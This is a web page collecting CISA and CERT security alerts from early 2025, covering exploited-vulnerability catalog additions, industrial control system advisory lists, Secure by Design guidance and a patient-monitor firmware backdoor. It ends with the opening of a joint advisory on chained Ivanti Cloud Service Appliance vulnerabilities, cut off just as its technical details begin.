Security – CERT Alerts (ENG)

Alerts from international Computer Emergency Response Teams (CERT-EU, US-CERT)

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 13 February 2025 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
      CVE-2024-57727 SimpleHelp Path Traversal Vulnerability
    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Releases Twenty Industrial Control Systems Advisories
    by CISA (Alerts) on 13 February 2025 at 12:00 pm

    CISA released twenty Industrial Control Systems (ICS) advisories on February 13, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
      ICSA-25-044-01 Siemens SIMATIC S7-1200 CPU Family
      ICSA-25-044-02 Siemens SIMATIC
      ICSA-25-044-03 Siemens SIPROTEC 5
      ICSA-25-044-04 Siemens SIPROTEC 5
      ICSA-25-044-05 Siemens SIPROTEC 5 Devices
      ICSA-25-044-06 Siemens RUGGEDCOM APE1808 Devices
      ICSA-25-044-07 Siemens Teamcenter
      ICSA-25-044-08 Siemens OpenV2G
      ICSA-25-044-09 Siemens SCALANCE W700
      ICSA-25-044-10 Siemens Questa and ModelSim
      ICSA-25-044-11 Siemens APOGEE PXC and TALON TC Series
      ICSA-25-044-12 Siemens SIMATIC IPC DiagBase and SIMATIC IPC DiagMonitor
      ICSA-25-044-13 Siemens SIMATIC PCS neo and TIA Administrator
      ICSA-25-044-14 Siemens Opcenter Intelligence
      ICSA-25-044-15 ORing IAP-420
      ICSA-25-044-16 mySCADA myPRO Manager
      ICSA-25-044-17 Outback Power Mojave Inverter
      ICSA-25-044-18 Dingtian DT-R0 Series
      ICSA-24-030-02 Mitsubishi Electric FA Engineering Software Products (Update C)
      ICSMA-25-044-01 Qardio Heart Health IOS and Android Application and QardioARM A100
    CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA Adds Two Known Exploited Vulnerabilities to Catalog
    by CISA (Alerts) on 12 February 2025 at 12:00 pm

    CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
      CVE-2025-24200 Apple iOS and iPadOS Incorrect Authorization Vulnerability
      CVE-2024-41710 Mitel SIP Phones Argument Injection Vulnerability
    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA and FBI Warn of Malicious Cyber Actors Using Buffer Overflow Vulnerabilities to Compromise Software
    by CISA (Alerts) on 12 February 2025 at 12:00 pm

    CISA and the Federal Bureau of Investigation (FBI) have released a Secure by Design Alert, Eliminating Buffer Overflow Vulnerabilities, as part of their cooperative Secure by Design Alert series—an ongoing series aimed at advancing industry-wide best practices to eliminate entire classes of vulnerabilities during the design and development phases of the product lifecycle. “Eliminating Buffer Overflow Vulnerabilities” describes proven techniques to prevent or mitigate buffer overflow vulnerabilities through secure by design principles and best practices. Buffer overflow vulnerabilities are a prevalent type of defect in memory-safe software design that can lead to system compromise. These vulnerabilities can lead to data corruption, sensitive data exposure, program crashes, and unauthorized code execution. Threat actors frequently exploit these vulnerabilities to gain initial access to an organization’s network and then move laterally to the wider network. CISA and FBI urge manufacturers to review the Alert and, where feasible, eliminate this class of defect by developing new software using memory-safe languages, using secure by design methods, and implementing the best practices supplied in this Alert. CISA and FBI also urge software customers to demand secure products from manufacturers that include these preventions. Visit CISA’s Secure by Design Pledge page to learn about our voluntary pledge, which focuses on enterprise software products and services—including on-premises software, cloud services, and software as a service (SaaS).

  • CISA Adds Four Known Exploited Vulnerabilities to Catalog
    by CISA (Alerts) on 11 February 2025 at 12:00 pm

    CISA has added four vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
      CVE-2024-40891 Zyxel DSL CPE OS Command Injection Vulnerability
      CVE-2024-40890 Zyxel DSL CPE OS Command Injection Vulnerability
      CVE-2025-21418 Microsoft Windows Ancillary Function Driver for WinSock Heap-Based Buffer Overflow Vulnerability
      CVE-2025-21391 Microsoft Windows Storage Link Following Vulnerability
    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Releases Two Industrial Control Systems Advisories
    by CISA (Alerts) on 11 February 2025 at 12:00 pm

    CISA released two Industrial Control Systems (ICS) advisories on February 11, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
      ICSA-24-319-17 2N Access Commander (Update A)
      ICSA-25-037-04 Trimble Cityworks (Update A)
    CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 7 February 2025 at 12:00 pm

    CISA has added one vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
      CVE-2025-0994 Trimble Cityworks Deserialization Vulnerability
    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • Trimble Releases Security Updates to Address a Vulnerability in Cityworks Software
    by CISA (Alerts) on 7 February 2025 at 12:00 pm

    CISA is collaborating with private industry partners to respond to reports of exploitation of a vulnerability (CVE-2025-0994) discovered by Trimble impacting its Cityworks Server AMS (Asset Management System). Trimble has released security updates and an advisory addressing a recently discovered deserialization vulnerability enabling an external actor to potentially conduct remote code execution (RCE) against a customer’s Microsoft Internet Information Services (IIS) web server. CISA has added CVE-2025-0994 to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CISA strongly encourages users and administrators to search for indicators of compromise (IOCs) and apply the necessary updates and workarounds. Review the following article for more information:
      Trimble Advisory and IOCs for Vulnerability Affecting Cityworks Deployments
    The Symantec Threat Hunter team, part of Broadcom, contributed to this guidance.

  • CISA Adds Five Known Exploited Vulnerabilities to Catalog
    by CISA (Alerts) on 6 February 2025 at 12:00 pm

    CISA has added five vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
      CVE-2025-0411 7-Zip Mark of the Web Bypass Vulnerability
      CVE-2022-23748 Dante Discovery Process Control Vulnerability
      CVE-2024-21413 Microsoft Outlook Improper Input Validation Vulnerability
      CVE-2020-29574 CyberoamOS (CROS) SQL Injection Vulnerability
      CVE-2020-15069 Sophos XG Firewall Buffer Overflow Vulnerability
    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Releases Six Industrial Control Systems Advisories
    by CISA (Alerts) on 6 February 2025 at 12:00 pm

    CISA released six Industrial Control Systems (ICS) advisories on February 6, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
      ICSA-25-037-01 Schneider Electric EcoStruxure Power Monitoring Expert (PME)
      ICSA-25-037-02 Schneider Electric EcoStruxure
      ICSA-25-037-03 ABB Drive Composer
      ICSA-25-037-04 Trimble Cityworks
      ICSMA-25-037-01 MicroDicom DICOM Viewer
      ICSMA-25-037-02 Orthanc Server
    CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 5 February 2025 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
      CVE-2024-53104 Linux Kernel Out-of-Bounds Write Vulnerability
    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Releases Nine Industrial Control Systems Advisories
    by CISA (Alerts) on 4 February 2025 at 12:00 pm

    CISA released nine Industrial Control Systems (ICS) advisories on February 4, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
      ICSA-25-035-01 Western Telematic Inc NPS Series, DSM Series, CPM Series
      ICSA-25-035-02 Rockwell Automation 1756-L8zS3 and 1756-L3zS3
      ICSA-25-035-03 Elber Communications Equipment
      ICSA-25-035-04 Schneider Electric Modicon M580 PLCs, BMENOR2200H and EVLink Pro AC
      ICSA-25-035-05 Schneider Electric Web Designer for Modicon
      ICSA-25-035-06 Schneider Electric Modicon M340 and BMXNOE0100/0110, BMXNOR0200H
      ICSA-25-035-07 Schneider Electric Pro-face GP-Pro EX and Remote HMI
      ICSA-25-035-08 AutomationDirect C-more EA9 HMI
      ICSA-23-299-03 Ashlar-Vellum Cobalt, Graphite, Xenon, Argon, Lithium (Update A)
    CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA Adds Four Known Exploited Vulnerabilities to Catalog
    by CISA (Alerts) on 4 February 2025 at 12:00 pm

    CISA has added four new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
      CVE-2024-45195 Apache OFBiz Forced Browsing Vulnerability
      CVE-2024-29059 Microsoft .NET Framework Information Disclosure Vulnerability
      CVE-2018-9276 Paessler PRTG Network Monitor OS Command Injection Vulnerability
      CVE-2018-19410 Paessler PRTG Network Monitor Local File Inclusion Vulnerability
    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Partners with ASD’s ACSC, CCCS, NCSC-UK, and Other International and US Organizations to Release Guidance on Edge Devices
    by CISA (Alerts) on 4 February 2025 at 12:00 pm

    CISA—in partnership with international and U.S. organizations—released guidance to help organizations protect their network edge devices and appliances, such as firewalls, routers, virtual private network (VPN) gateways, Internet of Things (IoT) devices, internet-facing servers, and internet-facing operational technology (OT) systems. The published guidance is as follows:
      “Security Considerations for Edge Devices,” led by the Canadian Centre for Cyber Security (CCCS), a part of the Communications Security Establishment Canada.
      “Digital Forensics Monitoring Specifications for Products of Network Devices and Applications,” led by the United Kingdom’s National Cyber Security Centre (NCSC-UK).
      “Mitigation Strategies for Edge Devices: Executive Guidance” and “Mitigation Strategies for Edge Devices: Practitioner Guidance,” two separate guides led by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC).
    Foreign adversaries routinely exploit software vulnerabilities in network edge devices to infiltrate critical infrastructure networks and systems. The damage can be expensive, time-consuming, and reputationally catastrophic for public and private sector organizations. These guidance documents detail various considerations and strategies for a more secure and resilient network both before and after a compromise. CISA and partner agencies urge device manufacturers and critical infrastructure owners and operators to review and implement the recommended actions and mitigations in the publications. Device manufacturers, please visit CISA’s Secure by Design page for more information on how to align development processes with the goal of reducing the prevalence of vulnerabilities in devices. Critical infrastructure owners and operators, please see Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products for guidance on procuring secure products.

  • CISA Releases Eight Industrial Control Systems Advisories
    by CISA (Alerts) on 30 January 2025 at 12:00 pm

    CISA released eight Industrial Control Systems (ICS) advisories on January 30, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
      ICSA-25-030-01 Hitachi Energy UNEM
      ICSA-25-030-02 New Rock Technologies Cloud Connected Devices
      ICSA-25-030-03 Schneider Electric System Monitor Application in Harmony and Pro-face PS5000 Legacy Industrial PCs
      ICSA-25-030-04 Rockwell Automation KEPServer
      ICSA-25-030-05 Rockwell Automation FactoryTalk AssetCentre
      ICSMA-25-030-01 Contec Health CMS8000 Patient Monitor
      ICSA-24-135-04 Mitsubishi Electric Multiple FA Engineering Software Products (Update B)
      ICSMA-22-244-01 Contec Health CMS8000 Patient Monitor (Update A)
    CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA Releases Fact Sheet Detailing Embedded Backdoor Function of Contec CMS8000 Firmware
    by CISA (Alerts) on 30 January 2025 at 12:00 pm

    CISA released a fact sheet, Contec CMS8000 Contains a Backdoor, detailing an analysis of three firmware package versions of the Contec CMS8000, a patient monitor used by the U.S. Healthcare and Public Health (HPH) sector. Analysts discovered that an embedded backdoor function with a hard-coded IP address, CWE-912: Hidden Functionality (CVE-2025-0626), and functionality that enables patient data spillage, CWE-359: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2025-0683), exist in all versions analyzed. Please note the Contec CMS8000 may be re-labeled and sold by resellers. For a list of known re-labeled devices, please refer to FDA’s safety communication, Cybersecurity Vulnerabilities with Certain Patient Monitors from Contec and Epsimed: FDA Safety Communication. Contec Medical Systems, the company which manufactures this monitor as well as other medical device and healthcare solutions, is headquartered in Qinhuangdao, China. The Contec CMS8000 is used in medical settings across the U.S. and European Union to provide continuous monitoring of a patient’s vital signs—tracking electrocardiogram, heart rate, blood oxygen saturation, non-invasive blood pressure, temperature, and respiration rate. CISA assesses that inclusion of this backdoor in the firmware of the patient monitor can create conditions which may allow remote code execution and device modification with the ability to alter its configuration. This introduces risk to patient safety as a malfunctioning patient monitor could lead to an improper response to patient vital signs. CISA strongly urges HPH sector organizations to review the fact sheet and implement FDA’s mitigations. Visit CISA’s Healthcare and Public Health Cybersecurity page to learn more about how to help improve cybersecurity within the HPH sector. For more information and guidance on protection against the most common and impactful threats, tactics, techniques, and procedures, visit CISA’s Cross-Sector Cybersecurity Performance Goals.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 29 January 2025 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation, as confirmed by Fortinet.
      CVE-2025-24085 Apple Multiple Products Use-After-Free Vulnerability
    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Releases Seven Industrial Control Systems Advisories
    by CISA (Alerts) on 28 January 2025 at 12:00 pm

    CISA released seven Industrial Control Systems (ICS) advisories on January 28, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
      ICSA-25-028-01 B&R Automation Runtime
      ICSA-25-028-02 Schneider Electric Power Logic
      ICSA-25-028-03 Rockwell Automation FactoryTalk
      ICSA-25-028-04 Rockwell Automation FactoryTalk View Site Edition
      ICSA-25-028-05 Rockwell Automation DataMosaix Private Cloud
      ICSA-25-028-06 Schneider Electric RemoteConnect and SCADAPack x70 Utilities
      ICSMA-24-352-01 BD Diagnostic Solutions Products (Update A)
    CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • 2025-004: Critical Vulnerability in SonicWall Products
    by Latest publications of type Security Advisories on 28 January 2025 at 8:36 am

    On January 22, 2025, SonicWall issued an advisory regarding a critical vulnerability in the Appliance Management Console (AMC) and Central Management Console (CMC) of the SonicWall SMA 1000. An unauthenticated, remote attacker could exploit this vulnerability to execute arbitrary code on the affected appliance. This vulnerability is being exploited in the wild. It is recommended to apply the update as soon as possible.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 24 January 2025 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
      CVE-2025-23006 SonicWall SMA1000 Appliances Deserialization Vulnerability
    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 23 January 2025 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
      CVE-2020-11023 jQuery Cross-Site Scripting (XSS) Vulnerability
    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Releases Six Industrial Control Systems Advisories
    by CISA (Alerts) on 23 January 2025 at 12:00 pm

    CISA released six Industrial Control Systems (ICS) advisories on January 23, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
      ICSA-25-023-01 mySCADA myPRO Manager
      ICSA-25-023-02 Hitachi Energy RTU500 Series Product
      ICSA-25-023-03 Schneider Electric EVlink Home Smart and Schneider Charge
      ICSA-25-023-04 Schneider Electric Easergy Studio
      ICSA-25-023-05 Schneider Electric EcoStruxure Power Build Rapsody
      ICSA-25-023-06 HMS Networks Ewon Flexy 202
    CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA and FBI Release Advisory on How Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications
    by CISA (Alerts) on 22 January 2025 at 12:00 pm

    CISA, in partnership with the Federal Bureau of Investigation (FBI), released Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications. This advisory was crafted in response to exploitation of vulnerabilities—CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities—in Ivanti Cloud Service Appliances (CSA) in September 2024. CISA, drawing on trusted third-party incident response data, found that threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. CISA and FBI strongly encourage network administrators and defenders to upgrade to the latest supported version of Ivanti CSA and to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) provided in the advisory. All members of the cybersecurity community are also encouraged to visit CISA’s Known Exploited Vulnerabilities Catalog to help better manage vulnerabilities and keep pace with threat activity. For more information and guidance on protection against the most common and impactful threats, tactics, techniques, and procedures, visit CISA’s Cross-Sector Cybersecurity Performance Goals.

  • CISA Releases Three Industrial Control Systems Advisories
    by CISA (Alerts) on 21 January 2025 at 12:00 pm

    CISA released three Industrial Control Systems (ICS) advisories on January 21, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
      ICSA-25-021-01 Traffic Alert and Collision Avoidance System (TCAS) II
      ICSA-25-021-02 Siemens SIMATIC S7-1200 CPUs
      ICSA-25-021-03 ZF Roll Stability Support Plus (RSSPlus)
    CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA and FBI Release Updated Guidance on Product Security Bad Practices
    by CISA (Alerts) on 17 January 2025 at 12:00 pm

    In partnership with the Federal Bureau of Investigation (FBI), CISA released an update to the joint guidance Product Security Bad Practices in furtherance of CISA’s Secure by Design initiative. This updated guidance incorporates public comments CISA received in response to a Request for Information, adding further bad practices, context regarding memory-safe languages, clarified timelines for patching Known Exploited Vulnerabilities (KEVs), and other recommendations. While this voluntary guidance is intended for software manufacturers who develop software products and services in support of critical infrastructure, all software manufacturers are strongly encouraged to avoid these product security bad practices. CISA and FBI urge software manufacturers to reduce customer risk by prioritizing security throughout the product development process. For more information and resources, visit CISA’s Secure by Design webpage or learn how to take CISA’s Secure by Design Pledge.

  • CISA Releases Twelve Industrial Control Systems Advisories
    by CISA (Alerts) on 16 January 2025 at 12:00 pm

    CISA released twelve Industrial Control Systems (ICS) advisories on January 16, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
      ICSA-25-016-01 Siemens Mendix LDAP
      ICSA-25-016-02 Siemens Industrial Edge Management
      ICSA-25-016-03 Siemens Siveillance Video Camera
      ICSA-25-016-04 Siemens SIPROTEC 5 Products
      ICSA-25-016-05 Fuji Electric Alpha5 SMART
      ICSA-25-016-06 Hitachi Energy FOX61x, FOXCST, and FOXMAN-UN Products
      ICSA-25-016-07 Hitachi Energy FOX61x Products
      ICSA-25-016-08 Schneider Electric Data Center Expert
      ICSA-24-058-01 Mitsubishi Electric Multiple Factory Automation Products (Update A)
      ICSA-25-010-03 Delta Electronics DRASimuCAD (Update A)
      ICSA-24-191-05 Johnson Controls Inc. Software House C●CURE 9000 (Update A)
      ICSA-24-030-02 Mitsubishi Electric FA Engineering Software Products (Update B)
    CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 16 January 2025 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

    - CVE-2024-50603 Aviatrix Controllers OS Command Injection Vulnerability

    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA and Partners Release Call to Action to Close the National Software Understanding Gap
    by CISA (Alerts) on 16 January 2025 at 12:00 pm

    Today, CISA—in partnership with the Defense Advanced Research Projects Agency (DARPA), the Office of the Under Secretary of Defense for Research and Engineering (OUSD R&E), and the National Security Agency (NSA)—published Closing the Software Understanding Gap. This report urgently implores the U.S. government to take decisive and coordinated action.  Software understanding refers to assessing software-controlled systems across all conditions. Mission owners and operators often lack adequate capabilities for software understanding because technology manufacturers build software that greatly outstrips the ability to understand it. This gap, along with the lack of secure by design software being created by technology manufacturers, can lead to the exploitation of software vulnerabilities.  The U.S. government has engaged in activities that have paved the way toward improving software understanding, including research investments, mission agency initiatives, and policy actions. This report further explores the opportunity for enhanced coordination to strengthen technical foundations and progress towards a more vigorous understanding of software on a national scale. To learn more about development practices and principles that build cybersecurity into the design and manufacture of technology products, visit CISA’s Secure by Design webpage.

  • Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications
    by CISA (CISA Cybersecurity Advisories) on 15 January 2025 at 5:26 pm

    Note: The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in Ivanti’s Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE-2025-0282 and CVE-2025-0283, see Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways.

    Summary

    The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities.

    According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors’ primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380; the other exploited CVE-2024-8963 and CVE-2024-9379. In one confirmed compromise, the actors moved laterally to two servers.

    All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below; according to Ivanti, these CVEs have not been exploited in version 5.0.[1] Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third-party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA. Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.

    Download the PDF version of this report: AA25-022A Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications (PDF, 755.77 KB). For a downloadable copy of IOCs, see: AA25-022A STIX XML (XML, 102.32 KB) and AA25-022A STIX JSON (JSON, 74.72 KB).

    Technical Details

    Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

    In September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and CVE-2024-8963.[2][3] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[1]

